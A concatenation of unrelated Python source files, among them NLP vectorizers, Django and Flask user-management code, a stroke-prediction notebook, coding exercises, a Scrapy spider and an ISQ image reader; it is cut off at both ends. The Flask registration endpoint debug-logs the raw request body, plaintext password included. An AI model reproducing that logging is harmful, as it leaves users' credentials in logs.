        print("TfidfVectorizer working time:", (finish - start).seconds)
        with open('tf_idf.pickle', 'wb') as file:
            pickle.dump(tfidf_vectorized, file)
    def tfidf_lsa_vectorize(self):
        """Load pickled tf-idf vectors, reduce to 100 dims (LSA) and pickle."""
        tfidf_lsa_vectorized = {}
        with open('tf_idf.pickle', 'rb') as file:
            tfidfs = pickle.load(file)
        matrix = [v for v in tfidfs.values()]
        key_list = [k for k in tfidfs.keys()]
        start = datetime.now()
        svd = TruncatedSVD(n_components=100)
        lsa = svd.fit_transform(matrix)
        for i in range(len(key_list)):
            tfidf_lsa_vectorized[key_list[i]] = lsa[i]
        finish = datetime.now()
        print("Tf-Idf dimensionality reduction time:", (finish - start).seconds)
        with open('tfidf_lsa.pickle', 'wb') as f:
            pickle.dump(tfidf_lsa_vectorized, f)
    def count_lsa_vectorize(self):
        """Count 1-3 grams, reduce to 100 dims with SVD (LSA) and pickle."""
        count_lsa_vectorized = {}
        key_list = [k for k in self.all_docs.keys()]
        corp_to_work = [" ".join(v) for v in self.all_docs.values()]
        start = datetime.now()
        vectorizer = CountVectorizer(ngram_range=(1, 3))
        arr = vectorizer.fit_transform(corp_to_work).toarray()
        svd = TruncatedSVD(n_components=100)
        lsa = svd.fit_transform(arr)
        for i in range(len(key_list)):
            count_lsa_vectorized[key_list[i]] = lsa[i]
        finish = datetime.now()
        print("LSA vectorizer working time:", (finish - start).seconds)
        with open('count_lsa.pickle', 'wb') as file:
            pickle.dump(count_lsa_vectorized, file)
|
from datetime import datetime
from django.contrib.auth.models import AbstractUser
from django.db import models
class User(AbstractUser):
    """Custom user: e-mail is the login field, `role` drives permissions, and
    a confirmation code (with its issue time) supports e-mail verification."""
    # NOTE(review): overrides AbstractUser.password (a 128-char hashed field)
    # with a shorter, nullable one — confirm this is intentional.
    password = models.CharField(max_length=100,
                                blank=True,
                                null=True)
    bio = models.CharField(max_length=200,
                           null=True,
                           blank=True)
    email = models.EmailField(max_length=100,
                              unique=True,
                              null=False)
    # NOTE(review): default=email assigns the *field object* as the default,
    # not the user's e-mail value — Django cannot use a Field instance as a
    # default; derive the username in save() or the serializer instead.
    username = models.CharField(max_length=100,
                                unique=True,
                                blank=True,
                                null=False,
                                default=email)
    ROLE_CHOICES = (
        ('user', 'user'),
        ('moderator', 'moderator'),
        ('admin', 'admin')
    )
    role = models.CharField(max_length=20,
                            choices=ROLE_CHOICES,
                            default="user")
    confirmation_code = models.CharField(max_length=8,
                                         null=True,
                                         blank=True)
    # FIX: pass the callable, not its result — `default=datetime.now()` was
    # evaluated once at import time, freezing the same timestamp into every
    # row; `default=datetime.now` is re-evaluated per object.
    data_confirmation_code = models.DateTimeField(
        null=False,
        blank=False,
        default=datetime.now)
    USERNAME_FIELD = 'email'
    REQUIRED_FIELDS = []
|
"""
URLIFY (CCI 1.3)
Write a method to replace all spaces in a string with '%20'. You may assume that the string has sufficient space at
the end to hold the additional characters, and that you are given the "true" length of the string.
NOTE: If implementing in Java, please use a character array so that you can perform this operation in place.
Example:
Input = "Mr John Smith ", 13
Output = "Mr%20John%20Smith"
NOTE: This question isn't really aimed at Python; normally, you'd work from back to front moving a single char at a
time, while replacing spaces with '%20'.
"""
def urlify(string: str, l=None):
    """Replace spaces with '%20' (CCI 1.3).

    :param string: input string, possibly padded with trailing spaces.
    :param l: "true" length of the string; when given, only the first ``l``
        characters are considered (the rest is padding). When omitted,
        trailing padding is dropped instead.
    :return: the URL-ified string.

    The original ignored ``l`` and used ``strip``, which also removed
    *leading* spaces that fall inside the true length and should be encoded.
    """
    s = string[:l] if l is not None else string.rstrip(" ")
    return s.replace(" ", "%20")


print(urlify("Mr John Smith    ", 13))
|
# coding: utf-8
# In[65]:
import pandas as pd
from sklearn.metrics import roc_auc_score, auc,roc_curve
import numpy as np
import xgboost as xgb
import matplotlib.pyplot as plt
import seaborn as sns
from statsmodels.stats.outliers_influence import variance_inflation_factor
from category_encoders import *
# Submission-file counter. The original left this commented out, so the
# ``'sub_' + str(i)`` line near the bottom raised NameError.
i = 1

# In[3]:
train = pd.read_csv("train.csv")
test = pd.read_csv("test.csv")

# In[4]:
train.head()

# In[5]:
test.head()

# In[12]:
# Exploratory plots: how each feature splits by stroke outcome.
train.plot(x='age', y='stroke', kind ='scatter')

# In[13]:
train[train['stroke']==1]['ever_married'].value_counts().sort_index().head(100).plot.bar()

# In[14]:
train[train['stroke']==0]['ever_married'].value_counts().sort_index().head(100).plot.bar()

# In[15]:
train[train['stroke']==1]['gender'].value_counts().sort_index().head(100).plot.bar()

# In[16]:
train[train['stroke']==0]['gender'].value_counts().sort_index().head(100).plot.bar()

# In[18]:
train[train['stroke']==0]['heart_disease'].value_counts().sort_index().head(100).plot.bar()

# In[19]:
train[train['stroke']==1]['heart_disease'].value_counts().sort_index().head(100).plot.bar()

# In[20]:
train[train['stroke']==1]['work_type'].value_counts().sort_index().head(100).plot.bar()

# In[21]:
train[train['stroke']==0]['work_type'].value_counts().sort_index().head(100).plot.bar()

# In[23]:
train[train['stroke']==0]['Residence_type'].value_counts().sort_index().head(100).plot.bar()

# In[24]:
train[train['stroke']==1]['Residence_type'].value_counts().sort_index().head(100).plot.bar()

# In[25]:
# pd.scatter_matrix was removed from the top-level pandas namespace;
# pd.plotting.scatter_matrix is the supported spelling (>= 0.20).
pd.plotting.scatter_matrix(train[['age','hypertension','avg_glucose_level','bmi','stroke']])

# In[26]:
pd.plotting.scatter_matrix(test[['age','hypertension','avg_glucose_level','bmi']])

# In[29]:
train.groupby('age')['stroke'].mean().plot()

# In[40]:
age_gender_stroke = train.groupby(['age','gender'], as_index = False)['stroke'].mean()

# In[41]:
age_gender_stroke.head()

# In[42]:
sns.factorplot(x='age', y='stroke', hue='gender', data=age_gender_stroke, fit_reg=False)
plt.show()

# In[43]:
sns.lmplot(x='age', y='stroke', hue='gender', data=age_gender_stroke.dropna(), fit_reg=False)
plt.show()

# In[31]:
train['hypertension'].value_counts()

# In[64]:
# DataFrame.append is deprecated/removed in newer pandas; pd.concat is the
# drop-in equivalent (same row order, index preserved).
train_test = pd.concat([train, test])

# # statmodels VIF
# In[60]:
#variance_inflation_factor(exog, exog_idx)
#One recommendation is that if VIF is greater than 5, then the explanatory variable given by exog_idx is highly collinear with the other explanatory variables, and the parameter estimates will have large standard errors because of this
df = train[['age','avg_glucose_level','bmi']].dropna()
pd.Series([variance_inflation_factor(df.values, i) for i in range(df.shape[1])], index=df.columns)

# # target encoding
# In[79]:
X = train.iloc[:,train.columns != 'stroke']
y = train['stroke']
enc = BinaryEncoder(cols=['hypertension','heart_disease','gender','ever_married','work_type','Residence_type','smoking_status']).fit(X, y)
numeric_dataset_train = enc.transform(X)
numeric_dataset_test = enc.transform(test)
train_test_use = pd.concat([numeric_dataset_train, numeric_dataset_test]) #if you want to use target encoding, uncomment this
train_test_use['stroke'] = list(train['stroke'].values) + [np.nan for i in range(len(test))]

# # OR
# # One hot encoding
# In[30]:
train_test_use = pd.concat([train_test[['age','hypertension','heart_disease','avg_glucose_level','bmi','stroke']],pd.get_dummies(train_test[['gender','ever_married','work_type','Residence_type','smoking_status']])], axis=1)

# # Modeling
# In[102]:
# First len(train) rows are train, the remainder is test (concat order above).
X_train_all=train_test_use[0:len(train.index)]
X_test=train_test_use[len(train.index):len(train_test_use.index)]
X_train_all.columns = [str(i) for i in X_train_all.columns]
X_test.columns = [str(i) for i in X_test.columns]
features=list(X_train_all.columns)
features.remove('stroke')
# 80/20 train/validation split; the validation set is the complement.
X_train=X_train_all.sample(frac=0.80, replace=False)
X_valid=pd.concat([X_train_all, X_train]).drop_duplicates(keep=False)
dtrain = xgb.DMatrix(X_train[features],X_train['stroke'] , missing=np.nan)
dvalid = xgb.DMatrix(X_valid[features],missing=np.nan)
dtest = xgb.DMatrix(X_test[features], missing=np.nan)

# In[103]:
nrounds = 35
watchlist = [(dtrain, 'train')]
params = {"objective": "binary:logistic","booster": "gbtree", "nthread": 4, "silent": 1,
          "eta": 0.087, "gamma":0.008, "max_depth": 6, "max_delta_step":0, "subsample": 0.9, "colsample_bytree": 0.7,
          "min_child_weight": 1, "sketch_eps":.02, "seed": 2016, "tree_method": "exact", "normalize_type":"tree", "eval_metric":"auc"}
bst = xgb.train(params, dtrain, num_boost_round=nrounds, evals=watchlist, verbose_eval=200)

# In[104]:
valid_preds = bst.predict(dvalid)
test_preds = bst.predict(dtest)
roc_auc_score(X_valid['stroke'], valid_preds)

# In[105]:
test_preds.shape

# In[ ]:
0.872698043358836#nround=35, eta=.087, max_depth=6, sub_sample=0.9, min_child_weight=1, "gamma":0.008, "sketch_eps":.02,

# In[106]:
sub = pd.DataFrame({'id':test['id'],'stroke':test_preds})
sub[['id','stroke']].to_csv('sub_'+str(i)+'.csv', index = False)
i = i+1

# In[107]:
sub['stroke'].max()
|
"""
Leetcode Problem 007: Reverse Integer
Author: Richard Coucoules
Solved: 2019-12-04
"""
class Solution:
    """LeetCode 7: reverse the decimal digits of an integer.

    Returns 0 when the reversed value falls outside the signed 32-bit
    range [-2^31, 2^31 - 1].
    """

    def reverse(self, x):
        """Return ``x`` with its digits reversed (sign preserved), or 0 on overflow."""
        sign = -1 if x < 0 else 1
        remaining = abs(x)
        reversed_n = 0
        # Peel digits off the low end and push them onto the result.
        while remaining:
            reversed_n = reversed_n * 10 + remaining % 10
            remaining //= 10
        reversed_n *= sign
        if not -(2 ** 31) <= reversed_n <= 2 ** 31 - 1:
            return 0
        return reversed_n
def main():
    """Smoke-test Solution.reverse against three known cases."""
    solver = Solution()
    # Expected outputs: 321, -321, 21
    for value in (123, -123, 120):
        print(solver.reverse(value))


if __name__ == "__main__":
    main()
|
# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import six
# six.add_metaclass applies ABCMeta in a way that works on both Python 2
# and Python 3 (this file predates py3-only syntax).
@six.add_metaclass(abc.ABCMeta)
class Resource(object):
    """This base class defines the interface used for compute resource
    plugins. It is not necessary to use this base class, but all compute
    resource plugins must implement the abstract methods found here.
    An instance of the plugin object is instantiated when it is loaded
    by calling __init__() with no parameters.
    """

    @abc.abstractmethod
    def reset(self, resources, driver):
        """Set the resource to an initial state based on the resource
        view discovered from the hypervisor.
        """
        pass

    @abc.abstractmethod
    def test(self, usage, limits):
        """Test to see if we have sufficient resources to allocate for
        an instance with the given resource usage.
        :param usage: the resource usage of the instances
        :param limits: limits to apply
        :returns: None if the test passes or a string describing the reason
        why the test failed
        """
        pass

    @abc.abstractmethod
    def add_instance(self, usage):
        """Update resource information adding allocation according to the
        given resource usage.
        :param usage: the resource usage of the instance being added
        :returns: None
        """
        pass

    @abc.abstractmethod
    def remove_instance(self, usage):
        """Update resource information removing allocation according to the
        given resource usage.
        :param usage: the resource usage of the instance being removed
        :returns: None
        """
        pass

    @abc.abstractmethod
    def write(self, resources):
        """Write resource data to populate resources.
        :param resources: the resources data to be populated
        :returns: None
        """
        pass

    @abc.abstractmethod
    def report_free(self):
        """Log free resources.
        This method logs how much free resource is held by
        the resource plugin.
        :returns: None
        """
        pass
|
# Michael Gennery
# DVD Database
# August 2020
# Create Table
import sqlite3
# Open (or create) the database file and get a cursor.
DVD_DB = sqlite3.connect('DVD_DB.db')
DVD_cursor = DVD_DB.cursor()

# Table schema: one row per film.
# "if not exists" makes this setup script re-runnable instead of raising
# sqlite3.OperationalError on the second run.
DVD_fields = """
create table if not exists DVD
(
barcode int, -- Barcode
name varchar, -- Name of Film
cert varchar, -- Certification
genre_1 varchar, -- Type of film
genre_2 varchar, -- Sub Type
actor_1 varchar, -- Main Actor
actor_2 varchar, -- Supporting Actor
director varchar, -- Director
company varchar, -- Production Company
run_time int, -- Running Time in minutes
year int -- Year of release
)
"""
DVD_cursor.execute(DVD_fields)
# Persist the DDL and release the connection (the original leaked it).
DVD_DB.commit()
DVD_DB.close()
|
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def index(response):
    """Render the dashboard landing page.

    NOTE(review): Django passes an HttpRequest as the first argument; the
    parameter is conventionally named ``request``.
    """
    return render(response, "dashboard/dshindex.html", {})
def pjDetails(response):
    """Render the project-details page (no template context needed)."""
    return render(response, "dashboard/projectDetails.html", {})
from repository import *
import heapq
class Controller:
    """Runs the evolutionary algorithm: repeated two-parent tournament
    steps (crossover + mutation + survivor selection) over a population
    created by the repository."""

    def __init__(self, repository):
        # Repository acts as the factory for populations.
        self.__repository = repository

    def iteration(self, args):
        # args - list of parameters needed to run one iteration
        # args = [population, map, starting_node]
        population = args[0]
        m = args[1]
        starting_node = args[2]
        population.evaluate(m, starting_node)
        # a iteration:
        # selection of the parents
        # randomly
        i1 = randint(0, population.getPopulationSize() - 1)
        i2 = randint(0, population.getPopulationSize() - 1)
        parent1 = population.getIndividuals()[i1]
        parent2 = population.getIndividuals()[i2]
        # create offsprings by crossover of the parents
        # NOTE(review): when the same individual is drawn twice, the
        # population is returned unchanged for this iteration — presumably
        # intentional; confirm.
        if parent1 != parent2:
            offspring1, offspring2 = parent1.crossover(parent2)
            # apply some mutations
            offspring1.mutate()
            offspring2.mutate()
            # selection of the survivors
            offspring1.fitness(m, starting_node)
            offspring2.fitness(m, starting_node)
            # sorted(..., reverse=True) relies on the individuals' ordering
            # (__lt__); the two best of {parents, offspring} survive.
            best = [parent1, parent2, offspring1, offspring2]
            best = sorted(best, reverse=True)
            # pop the ones with the best fitness and put them in population
            population.getIndividuals()[i1] = best[0]
            population.getIndividuals()[i2] = best[1]
        return population

    def run(self, args):
        # args - list of parameters needed in order to run the algorithm
        # args = [population, noOfIterations, map, starting_node]
        population = args[0]
        noOfIterations = args[1]
        for _ in range(noOfIterations):
            population = self.iteration([population, args[2], args[3]])
        result = population.selection(population.getPopulationSize())
        return result
        # until stop condition
        # perform an iteration
        # save the information need it for the statistics
        # return the results and the info for statistics

    def solver(self, args):
        # args - list of parameters needed in order to run the solver
        # args = [population_size, individual_size, noOfIterations, map, starting_node]
        # create the population,
        population = self.__repository.createPopulation([args[0], args[1]])
        # run the algorithm
        result = self.run([population, args[2], args[3], args[4]])
        return result
        # TODO return the results and the statistics
|
import pytest
@pytest.fixture
def samples():
    # Korean news-article text used as opaque shared test input; returned
    # as a 1-tuple of one multiline string. Do not edit the content.
    return (
        '''
“교육청 현장에서 다 하는 말이 현재 인력 구조에선 다른 감사를 줄이지 않는 한 사립유치원 감사에 비중을 두는 건 어렵지 않으냐고 얘기한다.”(한 교육청 관계자)
“현 인력으론 유치원을 포함해 도내 학교를 모두 감사하려면 10년이 걸린다.”(다른 교육청 관계자)
교육부가 내년도 상반기까지 대규모 유치원 등을 대상으로 종합감사를 예고한 가운데 서울시교육청만 하더라도 감사인력이 불과 4명밖에 되지 않는 등 현장 인력이 턱없이 부족한 것으로 21일 나타났다. 전국 시·도교육청 대부분이 유치원 전담 감사인력이 없는 탓에 감사인력 확대 등 보완 대책이 뒤따라야 한다는 목소리가 나온다.
■ “6명이 1100여개 유치원 감사”
이날 <한겨레>가 국회 교육위원회 소속 박용진 더불어민주당 의원을 통해 전국 17개 시·도교육청 중 13곳의 감사인력 자료를 받아 분석한 결과 평균 37.6명의 직원이 근무하고 있었다. 경기(85명)가 가장 많았고, 경남(52명), 부산(49명), 서울·전북(48명), 충남(34명), 충북(32명), 전남(31명), 대전(28명), 강원(27명), 울산(21명), 광주(20명), 세종(14명) 차례였다. 하지만 이 인원은 유치원뿐 아니라 초·중·고등학교 감사, 공무원 비위 등에 대한 사실조사를 담당하는 각 교육청 감사인력 전체를 집계한 것이다.
따라서 사립유치원 감사인력은 크게 줄어든다. 대부분의 교육청은 사립유치원 감사 담당을 따로 두지 않는다. 민원이 들어오면 감사인력 일부가 조사를 나가는 식이다. 서울시교육청의 경우 교육부가 지난 18일 ‘유치원 비리신고센터’를 꾸리기로 하자 전담팀을 만들었지만 인원이 팀장을 포함해 4명이다. 서울의 사립유치원은 650개(2018년 5월1일 기준)다. 서울시교육청 관계자는 “그동안 사립유치원 감사는 사안이 있거나 특별한 경우가 없으면 하지 못했다. 이제 급히 하려고 하니까 인력이 부족하다”며 “나쁘게 보면 졸속이라고 볼 수 있지만 일단 사립유치원 감사에 나름 최선을 다하려고 한다”고 토로했다. 경기도교육청은 감사5팀(6명)이 사립유치원 특정감사 업무를 전담해왔다. 경기도교육청 관계자는 “시민감사팀에서도 도와주지만 거긴 악성 민원도 처리해야 한다. 도내 사립유치원이 1100개가 넘는데 감사팀 6명으론 종합감사에 어려움이 있다”고 했다. 부산시교육청도 그동안 민원이 들어오면 4명이 팀을 꾸려 사실조사를 나가는 정도였다.
■ “‘배 째라’ 감사 방해도 많아”
이들이 적은 감사인력의 고충을 토로하는 이유는 사립유치원의 경우 회계서류를 제대로 갖추지 않아 들여다봐야 할 것이 많은데다, 유치원들이 ‘비협조‘로 대응하기 때문이다. 부산시교육청 관계자는 “사립유치원 조사를 하다 보면 서류가 미비되어 있거나 사람도 자주 바뀐다”며 “진행하는 과정이 너무 고되다”고 호소했다.
특히 이 관계자는 “행정처분으로 징계를 줘도 파면이 아니면 계속 유치원을 운영할 수 있고, 경고·주의 등의 경징계는 실효성이 없다는 생각이 들었다”며 “그러다 보니 유치원들이 ‘배 째라’ 태도로 감사를 방해하는 경우가 많다”고 했다. 경남도교육청 관계자도 “규정상 종합감사 주기가 3년이지만 감사인력이 적고 기관 수는 많다 보니 6년에 한번씩 돌아가고 있다. 도내 유치원부터 고등학교까지 감사기관이 1689개”라며 “우리가 1년에 할 수 있는 감사는 평균 120개 내외다. 도내 기관을 다 하려면 10년 정도 걸린다고 보면 된다”고 했다. 그는 “현장 감사의 어려움이 큰 만큼 인력 확대가 시급하다. 이는 전국 시·도가 안고 있는 문제”라고 강조했다.
박용진 의원은 “유치원을 대상으로 한 현행 특정감사에서 종합감사로 바꾸려면 감사인력 구조도 대폭 개선해야 한다”며 “제대로 된 유치원 비위 근절을 위해서는 국무총리 주관의 범정부 태스크포스(TF) 구성도 필수적”이라고 말했다. 서영지 기자 yj@hani.co.kr
''' # NOQA
        ,)
|
from flask import jsonify, request, current_app
from marshmallow import ValidationError
from flask_jwt_extended import jwt_required, current_user
from flask_jwt_extended import create_access_token, set_access_cookies
from userlogin.api.v1 import V1FlaskView
from userlogin.blueprints.user.models import User
from userlogin.blueprints.user.schemas import (
registration_schema,
users_schema,
user_schema,
user_query_schema,
user_update_schema,
user_schema_detailed,
users_schema_detailed
)
# XXX: Ideally, I should move this function to some lib/util module.
def match_current_user(username):
    """
    Utility function to match the given name against the current
    (logged in) user. Both username and email are compared.
    :param username: Username to match
    :return: True if it matches the current logged in user.
    """
    if current_user is None:
        return False
    # Equality against either identifier counts as a match.
    return username in (current_user.username, current_user.email)
class UsersView(V1FlaskView):
    """User CRUD endpoints: register (POST), query (GET),
    delete (DELETE) and rename (PATCH)."""

    def post(self):
        """Register a new user from the JSON body and start email activation.

        Returns 400 on empty body, 422 on schema validation failure,
        200 with the activation token on success.
        """
        json_data = request.get_json()
        current_app.logger.debug('Got data: {0}'.format(json_data))
        if not json_data:
            response = jsonify({'error': 'Invalid input'})
            return response, 400
        try:
            data = registration_schema.load(json_data)
            current_app.logger.debug(type(data))
            current_app.logger.debug(data)
        except ValidationError as err:
            response = {
                'error': err.messages
            }
            return jsonify(response), 422
        user = User()
        user.email = data.get('email')
        user.username = data.get('username')
        user.password = User.encrypt_pass(data.get('password'))
        user.save()
        activate_token = User.initiate_activation(user)
        data.update({'message' : "Please check your email for activating the account"})
        data.update({'token' : activate_token})
        return jsonify(data), 200

    # The jwt required here ensures that only the user having the valid
    # token presented to them earlier will have access to this endpoint.
    # This is the functionality we get from the framework. Which would
    # mean that non-logged in users can't even get here. Rest of the
    # Permission checking logic should be in the endpoint.
    @jwt_required
    def get(self):
        """Return one user's record (self or admin) or all users (admin only).

        NOTE(review): the 'Gotts data' / 'Malformed requet' strings contain
        typos; they are runtime log/error text, so they are left unchanged
        in this documentation-only pass.
        """
        json_data = request.get_json()
        current_app.logger.debug('Gotts data: {0}'.format(json_data))
        current_app.logger.debug('current user: {0}'.format(current_user.username))
        current_app.logger.debug('Request: {0}'.format(request))
        # Try to get the username from the request.
        username = None
        try:
            data = user_query_schema.load(json_data)
            username = data['username']
            detailed = data['detailed']
            current_app.logger.debug('fetching {0} info for {1}'.\
                format('detailed' if detailed else 'short',
                       username))
        except Exception as eall:
            current_app.logger.debug('Failed to load query schema: {0}'.format(eall))
            return jsonify({'error' : 'Malformed requet'}), 400
        current_app.logger.debug('Query for username {0}, current_user: {1}'
                                 ', admin: {2}'.format(
                                     username,
                                     current_user.username,
                                     current_user.is_admin()))
        if username is not None and username != 'all' and \
           (username == current_user.username or current_user.is_admin()):
            # Good request from current user self or admin for
            # a given user
            user = User.find_user(username)
            if user is not None:
                current_app.logger.debug('User: {0}'.format(user))
                if user.active:
                    if detailed:
                        response = {'data': user_schema_detailed.dump(user)}
                    else:
                        response = {'data': user_schema.dump(user)}
                else:
                    response = {'error' : 'user is not active.'}
            else:
                response = {'error' : 'Failed to find user'}
        elif current_user.is_admin():
            ## Good request, give specific user or all users.
            users = User.query.all()
            if detailed:
                response = {'data' : users_schema_detailed.dump(users)}
            else:
                response = {'data' : users_schema.dump(users)}
        else:
            response = {
                'error': 'Invalid request. Not authorized.'
            }
            return jsonify(response), 401
        return response, 200

    # The jwt required here ensures that only the user having the valid
    # token presented to them earlier will have access to this endpoint.
    # This is the functionality we get from the framework. Which would
    # mean that non-logged in users can't even get here. Rest of the
    # Permission checking logic should be in the endpoint.
    @jwt_required
    def delete(self):
        """Delete a user (self-delete or admin-delete); admin accounts are protected.

        Username comes from the query string first, then from the JSON body.
        """
        json_data = request.get_json()
        # Try to get the username from the request.
        try:
            current_app.logger.debug('Trying to get username from request: {0}'.format(request))
            username = request.args.get('username', default=None, type=str)
            current_app.logger.debug('Got username {0}'.format(username))
            if username is None:
                raise(AttributeError)
        except AttributeError as e:
            current_app.logger.debug('Failed to get username from request: {0}'.format(e))
            username = user_query_schema.load(json_data)['username']
            current_app.logger.debug('Got username {0}'.format(username))
        except Exception as eall:
            current_app.logger.debug('Failed to load query schema: {0}'.format(eall))
            username = None
        if username is not None and \
           (match_current_user(username) or current_user.is_admin()):
            # Good request from current user self or admin for
            # a given user
            user = User.find_user(username)
            # Won't let admins account be deleted (this should be fixed
            # further. It's not like we don't want to delete admins role
            # but we just don't want the last admin to be deleted in most
            # cases. Otherwise admin deletion should actually be OK.)
            if user is not None and not user.is_admin():
                user.delete()
                return jsonify({'message' : 'User deleted successfully'}), 200
            else:
                return jsonify({'error' : 'failed to find user'}), 404
        else:
            return jsonify({'error' : 'All user delete not supported'}), 400

    # The jwt required here ensures that only the user having the valid
    # token presented to them earlier will have access to this endpoint.
    # This is the functionality we get from the framework. Which would
    # mean that non-logged in users can't even get here. Rest of the
    # Permission checking logic should be in the endpoint.
    @jwt_required
    def patch(self):
        """Rename a user; only the logged-in user may rename themselves."""
        json_data = request.get_json()
        current_app.logger.debug('Got data: {0}'.format(json_data))
        current_app.logger.debug('type(current user): {0}'.format(type(current_user)))
        current_app.logger.debug('current user: {0}'.format(current_user))
        # Try to get the username from the request.
        try:
            current_app.logger.debug('Trying to get username from request: {0}'.format(request))
            data = user_update_schema.load(json_data)
            username = data['username']
            new_username = data['new_username']
            current_app.logger.debug('Got username: {0}, new_username: {1}'.format(username, new_username))
        except Exception as eall:
            current_app.logger.debug('Failed to load query schema: {0}'.format(eall))
            username = None
        if username is not None and match_current_user(username):
            # Good request from current user self or admin for
            # a given user
            user = User.find_user(username)
            if user is not None:
                if user.active:
                    user.update_username(new_username)
                    current_app.logger.debug('Updated successfully! {0}'.format(user))
                    return jsonify({'data': user_schema.dump(user)}), 200
                else:
                    return jsonify({'error' : 'User is not active. Please activate'}), 401
            else:
                return jsonify({'error' : 'failed to find user'}), 404
        else:
            return jsonify({'error' : 'Invalid input'}), 422
|
def test1():
    """Print a marker line and return the sentinel value 0."""
    message = "test1 inform"
    print(message)
    return 0
def test2():
    """Print a marker line and return a two-entry sample dict."""
    print("test2 inform")
    result = {"zhangsan": 'lisi', "wangwu": "zhaoliu"}
    return result
# Exercise both helpers, then echo their return values.
x, y = test1(), test2()
print(x)
print(y)
|
import scrapy
import re
from scrapy.loader import ItemLoader
from scrapy.loader.processors import TakeFirst
from ..items import MarchfelderebankItem
pattern = r'(\r)?(\n)?(\t)?(\xa0)?'
class SpiderSpider(scrapy.Spider):
    """Crawl the Marchfelder Bank news listing and scrape each article."""
    name = 'spider'
    start_urls = ['https://www.marchfelderbank.at/private/news']

    def parse(self, response):
        # Each article is linked from an <h3> heading on the listing page.
        article_links = response.xpath('//h3/a/@href').getall()
        yield from response.follow_all(article_links, self.parse_article)

    def parse_article(self, response):
        loader = ItemLoader(MarchfelderebankItem())
        loader.default_output_processor = TakeFirst()
        heading = response.xpath('//h1//text()').get()
        fragments = response.xpath('//ul[@class="block_list"]//text()').getall()
        # Strip whitespace, drop empty fragments, discard the trailing
        # element, then collapse to one space-separated string.
        cleaned = [fragment.strip() for fragment in fragments if fragment.strip()]
        body = ' '.join(cleaned[:-1])
        loader.add_value('title', heading)
        loader.add_value('link', response.url)
        loader.add_value('content', body)
        return loader.load_item()
|
import io
import numpy as np
from skimage.filters import threshold_otsu
#import skimage.measure
from scipy.ndimage.morphology import (
binary_erosion,
binary_closing,
binary_dilation,
)
from scipy.ndimage.filters import median_filter
from scipy.ndimage.measurements import label
from stacktools import save_stack, load_stack_from_path
def bytes_to_int(bytes):
    """Interpret *bytes* as a little-endian unsigned integer.

    Works with both Python 2 str (iteration yields 1-char strings) and
    Python 3 ``bytes`` (iteration yields ints) — the original called
    ``ord`` unconditionally, which raises TypeError on Python 3.
    """
    value = 0
    for n, b in enumerate(bytes):
        byte_val = b if isinstance(b, int) else ord(b)
        value += byte_val << (n * 8)
    return value
def fix_signed_stack(input_stack):
    """Deal with the problem of stacks with a signed integer value that probably
    shouldn't have them: clamp every negative voxel to zero."""
    return np.clip(input_stack, 0, None)
def calculate_box_bounds(center, radius):
    """Given a center position in 3D space and a radius, return the bounds
    (x1, x2, y1, y2, z1, z2) of the box containing a sphere centered at
    that point with the given radius."""
    xc, yc, zc = center
    return (xc - radius, xc + radius,
            yc - radius, yc + radius,
            zc - radius, zc + radius)
def find_section_of_isq_file(isq_filename, center, radius):
    """Return section from isq_filename as a numpy array, centered at the
    given location and with the given radius."""
    x1, x2, y1, y2, z1, z2 = calculate_box_bounds(center, radius)
    # Only the needed z-slab is read from disk; x/y cropping happens in memory.
    full_slab = read_isq_z_range(isq_filename, z1, z2)
    cropped = full_slab[x1:x2, y1:y2, :]
    return fix_signed_stack(cropped)
def extract_single_seed_stack(isq_filename, center, radius):
    """Return stack representing a single seed from the ISQ file isq_filename,
    centered at center with the given radius.

    Pipeline: Otsu threshold -> median filter -> binary erosion ->
    connected-component labeling; intermediate stacks are saved to disk.
    NOTE(review): the extraction step is commented out and a cached section
    is loaded from 'output/xian_section.stack' instead — presumably a
    debugging shortcut; confirm before production use. Nothing is returned
    despite the docstring.
    """
    # xian_section = find_section_of_isq_file(isq_filename, center, radius)
    # save_stack('xian_section', xian_section)
    xian_section = load_stack_from_path('output/xian_section.stack')
    # Binarize with Otsu's global threshold.
    tval = threshold_otsu(xian_section)
    thresholded_stack = xian_section > tval
    #save_stack('xian_thresh', thresholded_stack)
    # Median filter removes speckle noise from the binary stack.
    median_stack = median_filter(thresholded_stack, size=5)
    save_stack('xian_median', median_stack)
    # Erode to separate touching objects before labeling.
    selem = np.ones((5, 5, 5))
    eroded = binary_erosion(median_stack, structure=selem, iterations=3)
    save_stack('xian_eroded', eroded)
    # ccs = skimage.measure.label(eroded)
    # save_stack('xian_ccs', ccs)
    #eroded = load_stack_from_path('output/xian_eroded.stack')
    # 400^3 matches the 2*radius=400 cube extracted above — TODO confirm.
    label_array = np.zeros((400, 400, 400), dtype=np.uint32)
    label(eroded, output=label_array)
    save_stack('xian_ccs', label_array)
    # labels = np.unique(ccs)
    # print labels
def read_isq_z_range(filename, zstart, zend):
    """Read slices from the ISQ file, starting at zstart and finishing at
    zend.

    :param filename: path to the ISQ file
    :param zstart: first slice index (inclusive); must be >= 0
    :param zend: last slice index (exclusive); must be <= the file's zdim
    :returns: (xdim, ydim, zend - zstart) array of little-endian int16
    :raises IndexError: when the requested range falls outside the file
    """
    header = read_isq_header(filename)
    xdim, ydim, zdim = header['xdim'], header['ydim'], header['zdim']
    if zstart < 0:
        raise IndexError("Requested start of z stack below zero.")
    if zend > zdim:
        raise IndexError("Requested end of z stack outside range of file.")
    # 2048 byte header, then xdim * ydim 2 byte integers per slice
    read_start = 2048 + 2 * xdim * ydim * zstart
    read_size = 2 * xdim * ydim * (zend - zstart)
    with io.open(filename, 'rb') as f:
        f.seek(read_start)
        raw_bytes = f.read(read_size)
    # np.fromstring is deprecated (removed in modern numpy); frombuffer is
    # the supported equivalent. Note it returns a read-only view of the
    # bytes, which is fine here since callers never mutate in place.
    im_array = np.frombuffer(raw_bytes, dtype='<i2')
    nim = np.reshape(im_array, (xdim, ydim, -1), order='F')
    return nim
def read_isq_header(filename):
    """Read an ISQ file header.

    :param filename: path to the ISQ file
    :returns: dict with 'xdim', 'ydim', 'zdim' voxel dimensions

    The dimension fields are 4-byte little-endian integers at byte offsets
